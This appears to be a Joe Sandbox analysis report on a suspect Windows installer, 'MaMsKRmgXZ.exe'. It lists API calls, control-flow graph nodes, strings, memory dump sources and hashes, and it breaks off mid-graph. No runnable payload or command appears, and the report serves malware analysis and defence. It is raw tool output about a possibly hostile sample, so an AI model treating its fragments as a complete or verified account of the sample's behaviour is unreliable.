                                                                                                                                      • SetErrorMode.KERNELBASE ref: 0040325A
                                                                                                                                      • GetVersion.KERNEL32 ref: 00403260
                                                                                                                                      • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403293
                                                                                                                                      • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 004032CF
                                                                                                                                      • OleInitialize.OLE32(00000000), ref: 004032D6
                                                                                                                                      • SHGetFileInfoA.SHELL32(0041ECC8,00000000,?,00000160,00000000,?,00000006,00000008,0000000A), ref: 004032F2
                                                                                                                                      • GetCommandLineA.KERNEL32(00422F00,NSIS Error,?,00000006,00000008,0000000A), ref: 00403307
                                                                                                                                      • CharNextA.USER32(00000000,"C:\Users\user\Desktop\MaMsKRmgXZ.exe",00000020,"C:\Users\user\Desktop\MaMsKRmgXZ.exe",00000000,?,00000006,00000008,0000000A), ref: 00403343
                                                                                                                                      • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020,?,00000006,00000008,0000000A), ref: 00403440
                                                                                                                                      • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 00403451
                                                                                                                                      • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 0040345D
                                                                                                                                      • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 00403471
                                                                                                                                      • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403479
                                                                                                                                      • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 0040348A
                                                                                                                                      • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403492
                                                                                                                                      • DeleteFileA.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 004034A6
                                                                                                                                        • Part of subcall function 00406372: GetModuleHandleA.KERNEL32(?,?,?,004032A8,0000000A), ref: 00406384
                                                                                                                                        • Part of subcall function 00406372: GetProcAddress.KERNEL32(00000000,?), ref: 0040639F
                                                                                                                                        • Part of subcall function 004037F7: lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens,1033,Nagari Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Nagari Setup: Installing,00000000,00000002,751D3410), ref: 004038E7
                                                                                                                                        • Part of subcall function 004037F7: lstrcmpiA.KERNEL32(?,.exe), ref: 004038FA
                                                                                                                                        • Part of subcall function 004037F7: GetFileAttributesA.KERNEL32(Call), ref: 00403905
                                                                                                                                        • Part of subcall function 004037F7: LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens), ref: 0040394E
                                                                                                                                        • Part of subcall function 004037F7: RegisterClassA.USER32(00422EA0), ref: 0040398B
                                                                                                                                        • Part of subcall function 0040371D: CloseHandle.KERNEL32(000002C8,00403554,?,?,00000006,00000008,0000000A), ref: 00403728
                                                                                                                                      • OleUninitialize.OLE32(?,?,00000006,00000008,0000000A), ref: 00403554
                                                                                                                                      • ExitProcess.KERNEL32 ref: 00403575
                                                                                                                                      • GetCurrentProcess.KERNEL32(00000028,?,00000006,00000008,0000000A), ref: 00403692
                                                                                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 00403699
                                                                                                                                      • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004036B1
                                                                                                                                      • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 004036D0
                                                                                                                                      • ExitWindowsEx.USER32(00000002,80040002), ref: 004036F4
                                                                                                                                      • ExitProcess.KERNEL32 ref: 00403717
                                                                                                                                        • Part of subcall function 004056F6: MessageBoxIndirectA.USER32(00409218), ref: 00405751
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Process$ExitFile$EnvironmentHandlePathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesCharClassCloseCommandCurrentDeleteDirectoryErrorImageIndirectInfoInitializeLineLoadLookupMessageModeModuleNextOpenPrivilegePrivilegesProcRegisterUninitializeValueVersionlstrcmpi
                                                                                                                                      • String ID: "$"C:\Users\user\Desktop\MaMsKRmgXZ.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Feculae$C:\Users\user\Desktop$C:\Users\user\Desktop\MaMsKRmgXZ.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                                                                      • API String ID: 3776617018-1923197874
                                                                                                                                      • Opcode ID: 47f0f4bfed41ce18027c3f7b4cd283128f530326f184dcc79bdceb26c856a261
                                                                                                                                      • Instruction ID: 70de6b230954929a2c0fab4aa6e61a8dc1a32ac2bd4530e0982157a086cffda4
                                                                                                                                      • Opcode Fuzzy Hash: 47f0f4bfed41ce18027c3f7b4cd283128f530326f184dcc79bdceb26c856a261
                                                                                                                                      • Instruction Fuzzy Hash: 62C1F6706086526AE7216F759D49B2F3EA8EB81706F04453FF541B61E2CB7C8E05CB2E
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 134 40523f-40525b 135 405261-405328 GetDlgItem * 3 call 40409d call 40498e GetClientRect GetSystemMetrics SendMessageA * 2 134->135 136 4053ea-4053f0 134->136 154 405346-405349 135->154 155 40532a-405344 SendMessageA * 2 135->155 138 4053f2-405414 GetDlgItem CreateThread CloseHandle 136->138 139 40541a-405426 136->139 138->139 140 405448-40544e 139->140 141 405428-40542e 139->141 145 405450-405456 140->145 146 4054a3-4054a6 140->146 143 405430-405443 ShowWindow * 2 call 40409d 141->143 144 405469-405470 call 4040cf 141->144 143->140 158 405475-405479 144->158 150 405458-405464 call 404041 145->150 151 40547c-40548c ShowWindow 145->151 146->144 148 4054a8-4054ae 146->148 148->144 156 4054b0-4054c3 SendMessageA 148->156 150->144 159 40549c-40549e call 404041 151->159 160 40548e-405497 call 405101 151->160 161 405359-405370 call 404068 154->161 162 40534b-405357 SendMessageA 154->162 155->154 163 4055c0-4055c2 156->163 164 4054c9-4054f5 CreatePopupMenu call 405ffc AppendMenuA 156->164 159->146 160->159 173 405372-405386 ShowWindow 161->173 174 4053a6-4053c7 GetDlgItem SendMessageA 161->174 162->161 163->158 171 4054f7-405507 GetWindowRect 164->171 172 40550a-405520 TrackPopupMenu 164->172 171->172 172->163 175 405526-405540 172->175 176 405395 173->176 177 405388-405393 ShowWindow 173->177 174->163 178 4053cd-4053e5 SendMessageA * 2 174->178 179 405545-405560 SendMessageA 175->179 180 40539b-4053a1 call 40409d 176->180 177->180 178->163 179->179 181 405562-405582 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 179->181 180->174 183 405584-4055a4 SendMessageA 181->183 183->183 184 4055a6-4055ba GlobalUnlock SetClipboardData CloseClipboard 183->184 184->163
                                                                                                                                      APIs
                                                                                                                                      • GetDlgItem.USER32(?,00000403), ref: 0040529E
                                                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 004052AD
                                                                                                                                      • GetClientRect.USER32(?,?), ref: 004052EA
                                                                                                                                      • GetSystemMetrics.USER32(00000002), ref: 004052F1
                                                                                                                                      • SendMessageA.USER32(?,0000101B,00000000,?), ref: 00405312
                                                                                                                                      • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00405323
                                                                                                                                      • SendMessageA.USER32(?,00001001,00000000,?), ref: 00405336
                                                                                                                                      • SendMessageA.USER32(?,00001026,00000000,?), ref: 00405344
                                                                                                                                      • SendMessageA.USER32(?,00001024,00000000,?), ref: 00405357
                                                                                                                                      • ShowWindow.USER32(00000000,?,0000001B,?), ref: 00405379
                                                                                                                                      • ShowWindow.USER32(?,00000008), ref: 0040538D
                                                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 004053AE
                                                                                                                                      • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 004053BE
                                                                                                                                      • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004053D7
                                                                                                                                      • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 004053E3
                                                                                                                                      • GetDlgItem.USER32(?,000003F8), ref: 004052BC
                                                                                                                                        • Part of subcall function 0040409D: SendMessageA.USER32(00000028,?,00000001,00403ECD), ref: 004040AB
                                                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 004053FF
                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,Function_000051D3,00000000), ref: 0040540D
                                                                                                                                      • CloseHandle.KERNELBASE(00000000), ref: 00405414
                                                                                                                                      • ShowWindow.USER32(00000000), ref: 00405437
                                                                                                                                      • ShowWindow.USER32(?,00000008), ref: 0040543E
                                                                                                                                      • ShowWindow.USER32(00000008), ref: 00405484
                                                                                                                                      • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004054B8
                                                                                                                                      • CreatePopupMenu.USER32 ref: 004054C9
                                                                                                                                      • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 004054DE
                                                                                                                                      • GetWindowRect.USER32(?,000000FF), ref: 004054FE
                                                                                                                                      • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405517
                                                                                                                                      • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405553
                                                                                                                                      • OpenClipboard.USER32(00000000), ref: 00405563
                                                                                                                                      • EmptyClipboard.USER32 ref: 00405569
                                                                                                                                      • GlobalAlloc.KERNEL32(00000042,?), ref: 00405572
                                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 0040557C
                                                                                                                                      • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405590
                                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 004055A9
                                                                                                                                      • SetClipboardData.USER32(00000001,00000000), ref: 004055B4
                                                                                                                                      • CloseClipboard.USER32 ref: 004055BA
                                                                                                                                      Strings
                                                                                                                                      • Nagari Setup: Installing, xrefs: 0040552F
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                                      • String ID: Nagari Setup: Installing
                                                                                                                                      • API String ID: 590372296-2059581374
                                                                                                                                      • Opcode ID: 5e248db37e798cb99e868fa2efa30f8b142e25c36e83f8749ee739c671aa7136
                                                                                                                                      • Instruction ID: b9a96890980d2d8b9797d0de0d5ce2eab2fec2a682b8a0b11cb6d69254f0e8d6
                                                                                                                                      • Opcode Fuzzy Hash: 5e248db37e798cb99e868fa2efa30f8b142e25c36e83f8749ee739c671aa7136
                                                                                                                                      • Instruction Fuzzy Hash: C4A15CB1900208BFDB119FA0DD89AAE7FB9FB48355F00403AFA05B61A0C7B55E51DF69
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 6EC01215: GlobalAlloc.KERNEL32(00000040,6EC01233,?,6EC012CF,-6EC0404B,6EC011AB,-000000A0), ref: 6EC0121D
                                                                                                                                      • GlobalAlloc.KERNELBASE(00000040,000014A4), ref: 6EC01BC4
                                                                                                                                      • lstrcpyA.KERNEL32(00000008,?), ref: 6EC01C0C
                                                                                                                                      • lstrcpyA.KERNEL32(00000408,?), ref: 6EC01C16
                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 6EC01C29
                                                                                                                                      • GlobalFree.KERNEL32(?), ref: 6EC01D09
                                                                                                                                      • GlobalFree.KERNEL32(?), ref: 6EC01D0E
                                                                                                                                      • GlobalFree.KERNEL32(?), ref: 6EC01D13
                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 6EC01EFA
                                                                                                                                      • lstrcpyA.KERNEL32(?,?), ref: 6EC02098
                                                                                                                                      • GetModuleHandleA.KERNEL32(00000008), ref: 6EC02114
                                                                                                                                      • LoadLibraryA.KERNEL32(00000008), ref: 6EC02125
                                                                                                                                      • GetProcAddress.KERNEL32(?,?), ref: 6EC0217E
                                                                                                                                      • lstrlenA.KERNEL32(00000408), ref: 6EC02198
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.9908323213.000000006EC01000.00000020.00000001.01000000.00000005.sdmp, Offset: 6EC00000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.9908269121.000000006EC00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9908365679.000000006EC03000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9908406672.000000006EC05000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_6ec00000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 245916457-0
                                                                                                                                      • Opcode ID: 3cadceef18f6b3d3a7e34802550deb3ad6c24129fbe9153c282a53de1c38a57b
                                                                                                                                      • Instruction ID: 3bbd777f76241921911b02f7b855f4d0b738efecce70c92fc407dd37c3bd6dd5
                                                                                                                                      • Opcode Fuzzy Hash: 3cadceef18f6b3d3a7e34802550deb3ad6c24129fbe9153c282a53de1c38a57b
                                                                                                                                      • Instruction Fuzzy Hash: D222AB7191420ADEDB948FEE88947EDFBF4FB0630CF10452ED1A5A3184E7769A89CB50
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 714 4057a2-4057c8 call 405a60 717 4057e1-4057e8 714->717 718 4057ca-4057dc DeleteFileA 714->718 720 4057ea-4057ec 717->720 721 4057fb-40580b call 405fda 717->721 719 40596b-40596f 718->719 722 4057f2-4057f5 720->722 723 405919-40591e 720->723 729 40581a-40581b call 4059b9 721->729 730 40580d-405818 lstrcatA 721->730 722->721 722->723 723->719 725 405920-405923 723->725 727 405925-40592b 725->727 728 40592d-405935 call 4062dd 725->728 727->719 728->719 738 405937-40594b call 405972 call 40575a 728->738 733 405820-405823 729->733 730->733 734 405825-40582c 733->734 735 40582e-405834 lstrcatA 733->735 734->735 737 405839-405857 lstrlenA FindFirstFileA 734->737 735->737 739 40585d-405874 call 40599d 737->739 740 40590f-405913 737->740 750 405963-405966 call 405101 738->750 751 40594d-405950 738->751 747 405876-40587a 739->747 748 40587f-405882 739->748 740->723 742 405915 740->742 742->723 747->748 752 40587c 747->752 753 405884-405889 748->753 754 405895-4058a3 call 405fda 748->754 750->719 751->727 755 405952-405961 call 405101 call 405db9 751->755 752->748 757 40588b-40588d 753->757 758 4058ee-405900 FindNextFileA 753->758 764 4058a5-4058ad 754->764 765 4058ba-4058c5 call 40575a 754->765 755->719 757->754 763 40588f-405893 757->763 758->739 762 405906-405909 FindClose 758->762 762->740 763->754 763->758 764->758 767 4058af-4058b8 call 4057a2 764->767 774 4058e6-4058e9 call 405101 765->774 775 4058c7-4058ca 765->775 767->758 774->758 777 4058cc-4058dc call 405101 call 405db9 775->777 778 4058de-4058e4 775->778 777->758 778->758
                                                                                                                                      APIs
                                                                                                                                      • DeleteFileA.KERNELBASE(?,?,751D3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004057CB
                                                                                                                                      • lstrcatA.KERNEL32(00420D10,\*.*,00420D10,?,?,751D3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405813
                                                                                                                                      • lstrcatA.KERNEL32(?,00409014,?,00420D10,?,?,751D3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405834
                                                                                                                                      • lstrlenA.KERNEL32(?,?,00409014,?,00420D10,?,?,751D3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040583A
                                                                                                                                      • FindFirstFileA.KERNEL32(00420D10,?,?,?,00409014,?,00420D10,?,?,751D3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040584B
                                                                                                                                      • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 004058F8
                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 00405909
                                                                                                                                      Strings
                                                                                                                                      • "C:\Users\user\Desktop\MaMsKRmgXZ.exe", xrefs: 004057A2
                                                                                                                                      • \*.*, xrefs: 0040580D
                                                                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 004057AF
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                      • String ID: "C:\Users\user\Desktop\MaMsKRmgXZ.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                                                                      • API String ID: 2035342205-138588656
                                                                                                                                      • Opcode ID: 9534ed492e479d78e2508825cc8aff22a23d0aad2da830bd7208bf437f0dd8c3
                                                                                                                                      • Instruction ID: d5f8e1a5a2f38c4268bcbec4acbb3c578bb2518a62eabdffbc14051f19ad4651
                                                                                                                                      • Opcode Fuzzy Hash: 9534ed492e479d78e2508825cc8aff22a23d0aad2da830bd7208bf437f0dd8c3
                                                                                                                                      • Instruction Fuzzy Hash: F251E171900A18BADB21BB228C45BAF7A79DF42724F14807BF841B51D2D77C8942DEAD
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: b42b921e85d89c0e117f5f9f4e0d0c16e752254418a7148ec341c06b29f841c9
                                                                                                                                      • Instruction ID: 4f714145f5a313d6319dbd2ae6a602097e3dd159542c3e152d0bb7460fb66c8d
                                                                                                                                      • Opcode Fuzzy Hash: b42b921e85d89c0e117f5f9f4e0d0c16e752254418a7148ec341c06b29f841c9
                                                                                                                                      • Instruction Fuzzy Hash: 25F17571D00229CBDF28CFA8C8946ADBBB0FF44305F25856ED856BB281D7395A96CF44
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • FindFirstFileA.KERNELBASE(751D3410,00421558,C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp,00405AA3,C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp,C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp,C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp,751D3410,?,C:\Users\user\AppData\Local\Temp\,004057C2,?,751D3410,C:\Users\user\AppData\Local\Temp\), ref: 004062E8
                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 004062F4
                                                                                                                                      Strings
                                                                                                                                      • C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp, xrefs: 004062DD
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Find$CloseFileFirst
                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp
                                                                                                                                      • API String ID: 2295610775-1038464266
                                                                                                                                      • Opcode ID: 78efce08eb58f860d58d9cc4337d862744689776f4b13788d4bc070c197dd51e
                                                                                                                                      • Instruction ID: 9f0851c2fc9ceccd35e24d87c19841e9ead441a619ffea6187f1505ec1ede2b7
                                                                                                                                      • Opcode Fuzzy Hash: 78efce08eb58f860d58d9cc4337d862744689776f4b13788d4bc070c197dd51e
                                                                                                                                      • Instruction Fuzzy Hash: B1D012319090207BC30117386E0C85B7A599B553317228A77F967F12F0C7388C7696E9
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 185 403b94-403ba6 186 403ce7-403cf6 185->186 187 403bac-403bb2 185->187 189 403d45-403d5a 186->189 190 403cf8-403d40 GetDlgItem * 2 call 404068 SetClassLongA call 40140b 186->190 187->186 188 403bb8-403bc1 187->188 193 403bc3-403bd0 SetWindowPos 188->193 194 403bd6-403bd9 188->194 191 403d9a-403d9f call 4040b4 189->191 192 403d5c-403d5f 189->192 190->189 204 403da4-403dbf 191->204 196 403d61-403d6c call 401389 192->196 197 403d92-403d94 192->197 193->194 199 403bf3-403bf9 194->199 200 403bdb-403bed ShowWindow 194->200 196->197 218 403d6e-403d8d SendMessageA 196->218 197->191 203 404035 197->203 205 403c15-403c18 199->205 206 403bfb-403c10 DestroyWindow 199->206 200->199 213 404037-40403e 203->213 211 403dc1-403dc3 call 40140b 204->211 212 403dc8-403dce 204->212 208 403c1a-403c26 SetWindowLongA 205->208 209 403c2b-403c31 205->209 214 404012-404018 206->214 208->213 216 403cd4-403ce2 call 4040cf 209->216 217 403c37-403c48 GetDlgItem 209->217 211->212 221 403ff3-40400c DestroyWindow EndDialog 212->221 222 403dd4-403ddf 212->222 214->203 220 40401a-404020 214->220 216->213 223 403c67-403c6a 217->223 224 403c4a-403c61 SendMessageA IsWindowEnabled 217->224 218->213 220->203 226 404022-40402b ShowWindow 220->226 221->214 222->221 227 403de5-403e32 call 405ffc call 404068 * 3 GetDlgItem 222->227 228 403c6c-403c6d 223->228 229 403c6f-403c72 223->229 224->203 224->223 226->203 255 403e34-403e39 227->255 256 403e3c-403e78 ShowWindow KiUserCallbackDispatcher call 40408a EnableWindow 227->256 233 403c9d-403ca2 call 404041 228->233 234 403c80-403c85 229->234 235 403c74-403c7a 229->235 233->216 238 403cbb-403cce SendMessageA 234->238 240 403c87-403c8d 234->240 235->238 239 403c7c-403c7e 235->239 238->216 239->233 243 403ca4-403cad call 40140b 240->243 244 403c8f-403c95 call 40140b 240->244 243->216 252 403caf-403cb9 243->252 253 403c9b 244->253 252->253 253->233 255->256 259 403e7a-403e7b 256->259 260 403e7d 256->260 261 403e7f-403ead GetSystemMenu EnableMenuItem SendMessageA 259->261 260->261 262 403ec2 261->262 263 403eaf-403ec0 SendMessageA 261->263 264 403ec8-403f02 call 40409d call 403b75 call 405fda lstrlenA 